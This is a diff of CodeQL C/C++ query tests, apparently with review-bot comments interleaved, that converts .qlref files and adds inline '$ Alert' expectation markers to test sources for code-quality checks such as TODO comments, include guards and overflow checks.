+++ b/cpp/ql/test/query-tests/Diagnostics/ExtractionWarnings.qlref @@ -1 +1 @@ -Diagnostics/ExtractionWarnings.ql +query: Diagnostics/ExtractionWarnings.ql diff --git a/cpp/ql/test/query-tests/Diagnostics/FailedExtractorInvocations.qlref b/cpp/ql/test/query-tests/Diagnostics/FailedExtractorInvocations.qlref index e3f6cd687d3d..3484d485f1e5 100644 --- a/cpp/ql/test/query-tests/Diagnostics/FailedExtractorInvocations.qlref +++ b/cpp/ql/test/query-tests/Diagnostics/FailedExtractorInvocations.qlref @@ -1 +1 @@ -Diagnostics/FailedExtractorInvocations.ql +query: Diagnostics/FailedExtractorInvocations.ql diff --git a/cpp/ql/test/query-tests/Documentation/CommentedOutCode/CommentedOutCode.qlref b/cpp/ql/test/query-tests/Documentation/CommentedOutCode/CommentedOutCode.qlref index ae0fe399adcf..2597ad4e923f 100644 --- a/cpp/ql/test/query-tests/Documentation/CommentedOutCode/CommentedOutCode.qlref +++ b/cpp/ql/test/query-tests/Documentation/CommentedOutCode/CommentedOutCode.qlref @@ -1 +1,2 @@ -Documentation/CommentedOutCode.ql +query: Documentation/CommentedOutCode.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Documentation/CommentedOutCode/test.c b/cpp/ql/test/query-tests/Documentation/CommentedOutCode/test.c index 2fce1b0e9827..b3cbe90b4f8c 100644 --- a/cpp/ql/test/query-tests/Documentation/CommentedOutCode/test.c +++ b/cpp/ql/test/query-tests/Documentation/CommentedOutCode/test.c @@ -1,16 +1,16 @@ -// commented out code; +// commented out code; // $ Alert // some; // commented; // out; -// code; +// code; // $ Alert // also; // this // is; // commented-out -// code; +// code; // $ Alert // this // is; @@ -23,7 +23,7 @@ commented; out; code; -*/ +*/ // $ Alert /* also; @@ -31,7 +31,7 @@ is; commented-out code; -*/ +*/ // $ Alert /* this diff --git a/cpp/ql/test/query-tests/Documentation/CommentedOutCode/test2.cpp b/cpp/ql/test/query-tests/Documentation/CommentedOutCode/test2.cpp index e7a8019286f3..4818430d85d0 100644 
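Review bot: In the `//` cases of `CommentedOutCode/test.c` the expectation marker is appended to the very comment the query classifies, so the input becomes `// commented out code; // $ Alert` instead of `// commented out code;`. The `*/ // $ Alert` cases differ because there the marker is a separate comment token. The test no longer exercises the original comment text, which may matter if the query scores comment content (the annotated line no longer ends in `;`, for example). I would at least document this at the top of the file, e.g. `// NOTE: on line-comment cases the trailing "// $ Alert" is part of the comment under test.` The same holds for `test2.cpp` (`#include "config.h" // #include "config2.h" // $ Alert`) and for the `// TODO:` and `// FIXME:` line comments in the TodoComments tests.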
--- a/cpp/ql/test/query-tests/Documentation/CommentedOutCode/test2.cpp +++ b/cpp/ql/test/query-tests/Documentation/CommentedOutCode/test2.cpp @@ -34,21 +34,21 @@ // Example: { 1, 2, 3, 4 } -// int myFunction() { return myValue; } +// int myFunction() { return myValue; } // $ Alert -// int myFunction() const { return myValue; } +// int myFunction() const { return myValue; } // $ Alert -// int myFunction() const noexcept { return myValue; } +// int myFunction() const noexcept { return myValue; } // $ Alert -// #define MYMACRO +// #define MYMACRO // $ Alert -// #include "include.h" +// #include "include.h" // $ Alert /* #ifdef void myFunction(); #endif -*/ +*/ // $ Alert // define some constants @@ -56,15 +56,15 @@ void myFunction(); // #hashtag -// #if(defined(MYMACRO)) +// #if(defined(MYMACRO)) // $ Alert // #iffy -// #pragma once +// #pragma once // $ Alert -// # pragma once +// # pragma once // $ Alert -/*#error"myerror"*/ +/*#error"myerror"*/ // $ Alert #ifdef MYMACRO @@ -92,7 +92,7 @@ void myFunction(); #ifdef MYMACRO // ... #endif // #ifdef MYMACRO -*/ +*/ // $ Alert #ifdef MYMACRO1 @@ -104,7 +104,7 @@ void myFunction(); #endif // #ifdef MYMACRO2 #endif // #ifdef MYMACRO1 -#include "config.h" // #include "config2.h" +#include "config.h" // #include "config2.h" // $ Alert #ifdef MYMACRO @@ -112,10 +112,10 @@ void myFunction(); #endif /* #ifdef MYMACRO */ -#error "error" /* #ifdef MYMACRO */ +#error "error" /* #ifdef MYMACRO */ // $ Alert -// commented_out_code(); +// commented_out_code(); // $ Alert #if 0 - // commented_out_code(); + // commented_out_code(); // $ Alert #endif diff --git a/cpp/ql/test/query-tests/Documentation/DocumentApi/DocumentApi.qlref b/cpp/ql/test/query-tests/Documentation/DocumentApi/DocumentApi.qlref index 41bcfe740bb4..f46b3b829259 100644 --- a/cpp/ql/test/query-tests/Documentation/DocumentApi/DocumentApi.qlref +++ b/cpp/ql/test/query-tests/Documentation/DocumentApi/DocumentApi.qlref 
@@ -1 +1,2 @@ -Documentation/DocumentApi.ql +query: Documentation/DocumentApi.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Documentation/DocumentApi/comment_prototypes.c b/cpp/ql/test/query-tests/Documentation/DocumentApi/comment_prototypes.c index bb05ef8c015f..398e84f6f6a0 100644 --- a/cpp/ql/test/query-tests/Documentation/DocumentApi/comment_prototypes.c +++ b/cpp/ql/test/query-tests/Documentation/DocumentApi/comment_prototypes.c @@ -26,12 +26,12 @@ void proto5(void) { int i2; int i3; } -void proto6(void) { +void proto6(void) { // $ Alert int i1; int i2; int i3; } -void proto7(void) { +void proto7(void) { // $ Alert int i1; int i2; int i3; @@ -42,17 +42,17 @@ void proto8(void) { int i2; int i3; } -void proto9(void) { +void proto9(void) { // $ Alert int i1; int i2; int i3; } -void proto10(void) { +void proto10(void) { // $ Alert int i1; int i2; int i3; } -void proto11(void) { +void proto11(void) { // $ Alert int i1; int i2; int i3; @@ -63,7 +63,7 @@ void proto12(void) { int i2; int i3; } -void proto13(void) { +void proto13(void) { // $ Alert int i1; int i2; int i3; diff --git a/cpp/ql/test/query-tests/Documentation/DocumentApi/definition.c b/cpp/ql/test/query-tests/Documentation/DocumentApi/definition.c index 1894482d62f2..650bac038a0e 100644 --- a/cpp/ql/test/query-tests/Documentation/DocumentApi/definition.c +++ b/cpp/ql/test/query-tests/Documentation/DocumentApi/definition.c @@ -1,5 +1,5 @@ -void f1(void) { +void f1(void) { // $ Alert int x1; int x2; int x3; @@ -29,7 +29,7 @@ void f5(void) { int x3; } -void f6(void) { +void f6(void) { // $ Alert int x1; int x2; int x3; diff --git a/cpp/ql/test/query-tests/Documentation/TodoComments/FixmeComments.qlref b/cpp/ql/test/query-tests/Documentation/TodoComments/FixmeComments.qlref index 8392f493657e..b81e1a2fcbe5 100644 --- a/cpp/ql/test/query-tests/Documentation/TodoComments/FixmeComments.qlref 
+++ b/cpp/ql/test/query-tests/Documentation/TodoComments/FixmeComments.qlref @@ -1 +1,2 @@ -Documentation/FixmeComments.ql +query: Documentation/FixmeComments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Documentation/TodoComments/TodoComments.qlref b/cpp/ql/test/query-tests/Documentation/TodoComments/TodoComments.qlref index bb57dbe50cee..9bee8d3dbfb3 100644 --- a/cpp/ql/test/query-tests/Documentation/TodoComments/TodoComments.qlref +++ b/cpp/ql/test/query-tests/Documentation/TodoComments/TodoComments.qlref @@ -1 +1,2 @@ -Documentation/TodoComments.ql +query: Documentation/TodoComments.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Documentation/TodoComments/todo.c b/cpp/ql/test/query-tests/Documentation/TodoComments/todo.c index da16a6640920..e20f4be97547 100644 --- a/cpp/ql/test/query-tests/Documentation/TodoComments/todo.c +++ b/cpp/ql/test/query-tests/Documentation/TodoComments/todo.c @@ -1,14 +1,14 @@ -/* TODO This is a simple to do comment */ +/* TODO This is a simple to do comment */ // $ Alert[cpp/todo-comment] -/* TODO */ +/* TODO */ // $ Alert[cpp/todo-comment] /* TODO This is a - * multi-line comment */ + * multi-line comment */ // $ Alert[cpp/todo-comment] /* Some comment * TODO This is a mid-comment - * multi-line comment */ + * multi-line comment */ // $ Alert[cpp/todo-comment] /* Some comment * with a TODO This is a mid-comment mid-line @@ -18,9 +18,9 @@ * TODO This is a mid-comment * multi-line comment with two * TODO comments - * inside it */ + * inside it */ // $ Alert[cpp/todo-comment] -/* TODO This comment mentions TODO in its body too */ +/* TODO This comment mentions TODO in its body too */ // $ Alert[cpp/todo-comment] -// TODO: Can have C++-style comments too +// TODO: Can have C++-style comments too // $ Alert[cpp/todo-comment] 
diff --git a/cpp/ql/test/query-tests/Documentation/TodoComments/todo_fixme.cpp b/cpp/ql/test/query-tests/Documentation/TodoComments/todo_fixme.cpp index 5162d68f39ab..a5563e803ebc 100644 --- a/cpp/ql/test/query-tests/Documentation/TodoComments/todo_fixme.cpp +++ b/cpp/ql/test/query-tests/Documentation/TodoComments/todo_fixme.cpp @@ -1,13 +1,13 @@ -// TODO: Thing 1. -/* TODO: Thing 2. */ +// TODO: Thing 1. // $ Alert[cpp/todo-comment] +/* TODO: Thing 2. */ // $ Alert[cpp/todo-comment] /** * TODO: Thing 3. - */ + */ // $ Alert[cpp/todo-comment] // For more things, read the /usr/local/doc/TODO file. -// FIXME: Bug 1. -/* FIXME: Bug 2. */ +// FIXME: Bug 1. // $ Alert[cpp/fixme-comment] +/* FIXME: Bug 2. */ // $ Alert[cpp/fixme-comment] /** * FIXME: Bug 3. - */ + */ // $ Alert[cpp/fixme-comment] // For more bugs, read the /usr/local/doc/FIXME file. diff --git a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/Cleanup-DuplicateIncludeGuard.qlref b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/Cleanup-DuplicateIncludeGuard.qlref index 1e431289b172..d179ad8e2380 100644 --- a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/Cleanup-DuplicateIncludeGuard.qlref +++ b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/Cleanup-DuplicateIncludeGuard.qlref @@ -1 +1,2 @@ -Header Cleanup/Cleanup-DuplicateIncludeGuard.ql \ No newline at end of file +query: Header Cleanup/Cleanup-DuplicateIncludeGuard.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header1.h b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header1.h index a0fa07dbb50a..7de21f0b2b3c 100644 --- a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header1.h +++ b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header1.h 
@@ -1,6 +1,6 @@ // header1.h -#ifndef INCLUDED_HEADER1 +#ifndef INCLUDED_HEADER1 // $ Alert #define INCLUDED_HEADER1 // ... diff --git a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header2.h b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header2.h index 9e4ad972812b..cf39b45c0fa8 100644 --- a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header2.h +++ b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header2.h @@ -1,6 +1,6 @@ // header2.h -#ifndef INCLUDED_HEADER1 // oops! +#ifndef INCLUDED_HEADER1 // oops! // $ Alert #define INCLUDED_HEADER1 // ... diff --git a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header4.h b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header4.h index 57b36896ebd0..a3e19a07615f 100644 --- a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header4.h +++ b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header4.h @@ -1,6 +1,6 @@ // header4.h -#ifndef INCLUDED_HEADER4 +#ifndef INCLUDED_HEADER4 // $ Alert #define INCLUDED_HEADER4 // ... diff --git a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header6.h b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header6.h index 2148e608917d..89c2abaa3313 100644 --- a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header6.h +++ b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header6.h @@ -1,6 +1,6 @@ // header6.h -#ifndef INCLUDED_HEADER6 +#ifndef INCLUDED_HEADER6 // $ Alert #define INCLUDED_HEADER6 // ... diff --git a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header7.h b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header7.h index 4dd8875d69d8..d8ea8f603cee 100644 --- a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header7.h 
+++ b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/header7.h @@ -1,6 +1,6 @@ // header7.h -#ifndef INCLUDED_HEADER6 // oops! +#ifndef INCLUDED_HEADER6 // oops! // $ Alert #define INCLUDED_HEADER6(x) (x) // ... diff --git a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/subfolder/header4.h b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/subfolder/header4.h index c5e44813dcd2..566227074b5b 100644 --- a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/subfolder/header4.h +++ b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/subfolder/header4.h @@ -1,6 +1,6 @@ // header4.h -#ifndef INCLUDED_HEADER4 // duplicate +#ifndef INCLUDED_HEADER4 // duplicate // $ Alert #define INCLUDED_HEADER4 // ... diff --git a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/subfolder/header5.h b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/subfolder/header5.h index ed54e7ea68cd..8dc0e496ebfe 100644 --- a/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/subfolder/header5.h +++ b/cpp/ql/test/query-tests/Header Cleanup/Cleanup-DuplicateIncludeGuard/subfolder/header5.h @@ -1,6 +1,6 @@ // header5.h -#ifndef INCLUDED_HEADER4 // duplicate +#ifndef INCLUDED_HEADER4 // duplicate // $ Alert #define INCLUDED_HEADER4 // ... diff --git a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFile/LimitedScopeFile.qlref b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFile/LimitedScopeFile.qlref index 5e38f12f9389..15b0c53ec249 100644 --- a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFile/LimitedScopeFile.qlref +++ b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFile/LimitedScopeFile.qlref @@ -1 +1,2 @@ -JPL_C/LOC-3/Rule 13/LimitedScopeFile.ql +query: JPL_C/LOC-3/Rule 13/LimitedScopeFile.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFile/file1.c b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFile/file1.c index 96e8dc7ce864..b1a66e8f312a 100644 --- a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFile/file1.c +++ b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFile/file1.c @@ -1,6 +1,6 @@ // file1.c -int globalInt1; // BAD [only accessed in this file] +int globalInt1; // BAD [only accessed in this file] // $ Alert int globalInt2; // GOOD [accessed in file1.c and file2.c] int globalInt3; // GOOD [referenced in file1.h] int globalInt4; // GOOD [only accessed in one function, should be function scope instead] diff --git a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFunction/LimitedScopeFunction.qlref b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFunction/LimitedScopeFunction.qlref index c5e632ca9b6b..26d720a2ac8a 100644 --- a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFunction/LimitedScopeFunction.qlref +++ b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFunction/LimitedScopeFunction.qlref @@ -1 +1,2 @@ -JPL_C/LOC-3/Rule 13/LimitedScopeFunction.ql +query: JPL_C/LOC-3/Rule 13/LimitedScopeFunction.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFunction/test.c b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFunction/test.c index a2089446ca77..80e7993e4f4c 100644 --- a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFunction/test.c +++ b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 13/LimitedScopeFunction/test.c 
@@ -5,9 +5,9 @@ int globalInt1; // GOOD [used in func1, func2] int globalInt2; // GOOD [used in func1, func2] int globalInt3; // GOOD [used in func1, func2] -int globalInt4; // BAD [only used in func1] -int globalInt5; // BAD [only used in func1] -int globalInt6; // BAD [only used in func1] +int globalInt4; // BAD [only used in func1] // $ Alert +int globalInt5; // BAD [only used in func1] // $ Alert +int globalInt6; // BAD [only used in func1] // $ Alert int globalInt7; // GOOD [not used, should be reported by another query] int globalInt8; // GOOD [used at file level] int *addrGlobalInt8 = &globalInt8; // GOOD [used in func1, func2] diff --git a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 17/BasicIntTypes.qlref b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 17/BasicIntTypes.qlref index 687711a321c4..e1e64db86c79 100644 --- a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 17/BasicIntTypes.qlref +++ b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 17/BasicIntTypes.qlref @@ -1 +1,2 @@ -JPL_C/LOC-3/Rule 17/BasicIntTypes.ql +query: JPL_C/LOC-3/Rule 17/BasicIntTypes.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 17/test.c b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 17/test.c index 2becb75d916c..ef0f79598fbb 100644 --- a/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 17/test.c +++ b/cpp/ql/test/query-tests/JPL_C/LOC-3/Rule 17/test.c @@ -3,7 +3,7 @@ typedef uint8_t U8; typedef U8 something_else; void test1(U8* xptr) { } void test2(U8 x) { } -void test3(unsigned char x) { } +void test3(unsigned char x) { } // $ Alert void test4(uint8_t x){ } void test5(something_else x){ } static U8 test6; diff --git a/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 29/NonConstFunctionPointer/NonConstFunctionPointer.qlref b/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 29/NonConstFunctionPointer/NonConstFunctionPointer.qlref index 80637efae7a5..256adc1b4f83 100644 
--- a/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 29/NonConstFunctionPointer/NonConstFunctionPointer.qlref +++ b/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 29/NonConstFunctionPointer/NonConstFunctionPointer.qlref @@ -1 +1,2 @@ -JPL_C/LOC-4/Rule 29/NonConstFunctionPointer.ql +query: JPL_C/LOC-4/Rule 29/NonConstFunctionPointer.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 29/NonConstFunctionPointer/test.c b/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 29/NonConstFunctionPointer/test.c index 9999d95be10d..5e7212066700 100644 --- a/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 29/NonConstFunctionPointer/test.c +++ b/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 29/NonConstFunctionPointer/test.c @@ -15,7 +15,7 @@ void test() funPtr2 = &myFunc2; //funPtr3 = &myFunc2; --- this would be a compilation error - funPtr1(); // BAD - funPtr2(); // BAD - funPtr3(); // GOOD [FALSE POSITIVE] + funPtr1(); // BAD // $ Alert + funPtr2(); // BAD // $ Alert + funPtr3(); // GOOD [FALSE POSITIVE] // $ Alert } diff --git a/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 30/FunctionPointerConversions/FunctionPointerConversions.qlref b/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 30/FunctionPointerConversions/FunctionPointerConversions.qlref index 48e8f90bf59b..803c795dc84b 100644 --- a/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 30/FunctionPointerConversions/FunctionPointerConversions.qlref +++ b/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 30/FunctionPointerConversions/FunctionPointerConversions.qlref @@ -1 +1,2 @@ -JPL_C/LOC-4/Rule 30/FunctionPointerConversions.ql +query: JPL_C/LOC-4/Rule 30/FunctionPointerConversions.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 30/FunctionPointerConversions/test.c b/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 30/FunctionPointerConversions/test.c index a36c9f396fe8..73a8aad87bd5 100644 
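Review bot: `funPtr3(); // GOOD [FALSE POSITIVE] // $ Alert` in the `NonConstFunctionPointer/test.c` hunk records a result that the file itself labels a false positive as an ordinary expected alert. Mark it `funPtr3(); // GOOD [FALSE POSITIVE] // $ SPURIOUS: Alert` so that the expectations separate wanted from unwanted results and a later precision fix to the query is reported as such. `test()` begins before the hunk.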
--- a/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 30/FunctionPointerConversions/test.c +++ b/cpp/ql/test/query-tests/JPL_C/LOC-4/Rule 30/FunctionPointerConversions/test.c @@ -8,14 +8,14 @@ void test() { void (*funPtr1)() = &myFunc1; // GOOD voidFunPtr funPtr2 = &myFunc1; // GOOD - int *intPtr = &myFunc1; // BAD (function pointer -> int pointer) - void *voidPtr = &myFunc1; // BAD (function pointer -> void pointer) + int *intPtr = &myFunc1; // BAD (function pointer -> int pointer) // $ Alert + void *voidPtr = &myFunc1; // BAD (function pointer -> void pointer) // $ Alert int i = &myFunc1; // GOOD (permitted) funPtr1 = funPtr1; // GOOD funPtr2 = funPtr1; // GOOD - intPtr = funPtr1; // BAD (function pointer -> int pointer) - voidPtr = funPtr1; // BAD (function pointer -> void pointer) + intPtr = funPtr1; // BAD (function pointer -> int pointer) // $ Alert + voidPtr = funPtr1; // BAD (function pointer -> void pointer) // $ Alert i = funPtr1; // GOOD (permitted) funPtr1 = funPtr2; // GOOD @@ -26,7 +26,7 @@ void test() funPtr1 = (void (*)())funPtr1; // GOOD funPtr2 = (voidFunPtr)funPtr1; // GOOD - intPtr = (int *)funPtr1; // BAD (function pointer -> int pointer) - voidPtr = (void *)funPtr1; // BAD (function pointer -> void pointer) + intPtr = (int *)funPtr1; // BAD (function pointer -> int pointer) // $ Alert + voidPtr = (void *)funPtr1; // BAD (function pointer -> void pointer) // $ Alert i = (int)funPtr1; // GOOD (permitted) } diff --git a/cpp/ql/test/query-tests/Likely Bugs/AmbiguouslySignedBitField/AmbiguouslySignedBitField.qlref b/cpp/ql/test/query-tests/Likely Bugs/AmbiguouslySignedBitField/AmbiguouslySignedBitField.qlref index 78378f7b2993..c2826b9bade4 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/AmbiguouslySignedBitField/AmbiguouslySignedBitField.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/AmbiguouslySignedBitField/AmbiguouslySignedBitField.qlref 
@@ -1 +1,2 @@ -Likely Bugs/AmbiguouslySignedBitField.ql +query: Likely Bugs/AmbiguouslySignedBitField.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/AmbiguouslySignedBitField/test.cpp b/cpp/ql/test/query-tests/Likely Bugs/AmbiguouslySignedBitField/test.cpp index 19aa4ef2e64b..7f2453b942d5 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/AmbiguouslySignedBitField/test.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/AmbiguouslySignedBitField/test.cpp @@ -9,18 +9,18 @@ enum myEnum { }; struct { - int nosign : 2; // BAD + int nosign : 2; // BAD // $ Alert signed int sign1 : 2; // GOOD unsigned int sign2 : 2; // GOOD signed sign3: 2; // GOOD unsigned sign4 : 2; // GOOD BOOL typedefbool: 2; // GOOD bool cppbool : 2; // GOOD - char nosignchar : 2; // BAD - short nosignshort : 2; // BAD - myAmbiguousType nosigntypedef : 2; // BAD + char nosignchar : 2; // BAD // $ Alert + short nosignshort : 2; // BAD // $ Alert + myAmbiguousType nosigntypedef : 2; // BAD // $ Alert mySignedType signedtypedef : 2; // GOOD - const int nosignconst : 2; // BAD + const int nosignconst : 2; // BAD // $ Alert const signed int signedconst : 2; myEnum nosignenum : 2; const myEnum constnosignenum : 2; diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/BadAdditionOverflowCheck.qlref b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/BadAdditionOverflowCheck.qlref index ae8cc803b690..75f106ffa079 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/BadAdditionOverflowCheck.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/BadAdditionOverflowCheck.qlref @@ -1 +1,2 @@ -Likely Bugs/Arithmetic/BadAdditionOverflowCheck.ql +query: Likely Bugs/Arithmetic/BadAdditionOverflowCheck.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql 
diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/ComparisonWithCancelingSubExpr.qlref b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/ComparisonWithCancelingSubExpr.qlref index d17e547e8e66..153457ea9906 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/ComparisonWithCancelingSubExpr.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/ComparisonWithCancelingSubExpr.qlref @@ -1 +1,2 @@ -Likely Bugs/Arithmetic/ComparisonWithCancelingSubExpr.ql +query: Likely Bugs/Arithmetic/ComparisonWithCancelingSubExpr.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/PointlessSelfComparison.qlref b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/PointlessSelfComparison.qlref index 92873b897597..55be0938e341 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/PointlessSelfComparison.qlref +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/PointlessSelfComparison.qlref @@ -1 +1,2 @@ -Likely Bugs/Arithmetic/PointlessSelfComparison.ql +query: Likely Bugs/Arithmetic/PointlessSelfComparison.ql +postprocess: utils/test/InlineExpectationsTestQuery.ql diff --git a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/SignedOverflowCheck.cpp b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/SignedOverflowCheck.cpp index e359fb098eb1..31d274209068 100644 --- a/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/SignedOverflowCheck.cpp +++ b/cpp/ql/test/query-tests/Likely Bugs/Arithmetic/BadAdditionOverflowCheck/SignedOverflowCheck.cpp 
@@ -5,7 +5,7 @@ bool cannotHoldAnother8(int n1) { // clang 8.0.0 -O2: deleted (silently) // gcc 9.2 -O2: deleted (silently) // msvc 19.22 /O2: not deleted - return n1 + 8 < n1; // BAD + return n1 + 8 < n1; // BAD // $ Alert[cpp/signed-overflow-check] } /* 2. Signed comparison with a narrower unsigned type. The narrower @@ -15,7 +15,7 @@ bool cannotHoldAnotherUShort(int n1, unsigned short delta) { // clang 8.0.0 -O2: deleted (silently) // gcc 9.2 -O2: deleted (silently) // msvc 19.22 /O2: not deleted - return n1 + delta < n1; // BAD + return n1 + delta < n1; // BAD // $ Alert[cpp/signed-overflow-check] } /* 3. Signed comparison with a non-narrower unsigned type. The @@ -32,7 +32,7 @@ bool shortShort1(unsigned short n1, unsigned short delta) { // BAD [BadAdditionOverflowCheck.ql] // GOOD [SigneOverflowCheck.ql]: Test always fails, but will never overflow. - return n1 + delta < n1; + return n1 + delta < n1; // $ Alert[cpp/bad-addition-overflow-check] } bool shortShort2(unsigned short n1, unsigned short delta) { @@ -70,7 +70,7 @@ extern se *getSo(void); bool func1(se *so) { se *o = getSo(); - if (so->xPos + so->xSize < so->xPos // BAD + if (so->xPos + so->xSize < so->xPos // BAD // $ Alert[cpp/signed-overflow-check] || so->xPos > o->xPos + o->xSize) { // GOOD // clang 8.0.0 -O2: not deleted // gcc 9.2 -O2: not deleted @@ -96,7 +96,7 @@ int checkOverflow4(unsigned int ioff, C c) { int overflow12(int n) { // not deleted by gcc or clang - return (n + 32 <= (unsigned)n? -1: 1); // BAD: n + 32 can overflow + return (n + 32 <= (unsigned)n? -1: 1); // BAD: n + 32 can 